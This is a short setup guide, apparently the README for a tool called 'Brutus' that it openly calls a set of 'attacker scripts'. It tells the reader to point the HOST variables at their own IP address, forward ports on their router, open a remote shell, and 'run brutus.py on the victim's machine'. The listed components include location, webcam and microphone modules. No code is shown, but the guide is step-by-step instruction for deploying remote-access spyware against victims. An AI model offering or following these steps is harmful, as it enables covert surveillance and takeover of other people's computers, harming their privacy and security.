Make sure that you are using Python3
Open up a terminal in the Brutus-folder and run the following command:**
$ pip install -r requirements.txt
Or if you should have installed Python3 & Python2:
$ pip3 install -r requirements.txt
Replace all HOST-variables with your IPv4 address
In order to use it outside of your network you need to setup port-forwarding on your Router & set HOST to "0.0.0.0" in all attacker scripts.
Make sure that 'brutus.py', 'microphone-client.py' and 'webcam-client.py' are in the same folder
Make sure that 'shell.py', 'locator.py', 'microphone-host.py' and 'webcam-host.py' are in the same folder
Open up 'shell.py'
Run 'brutus.py' on the victim's machine
##! If issues should arise, do not hesitate to contact me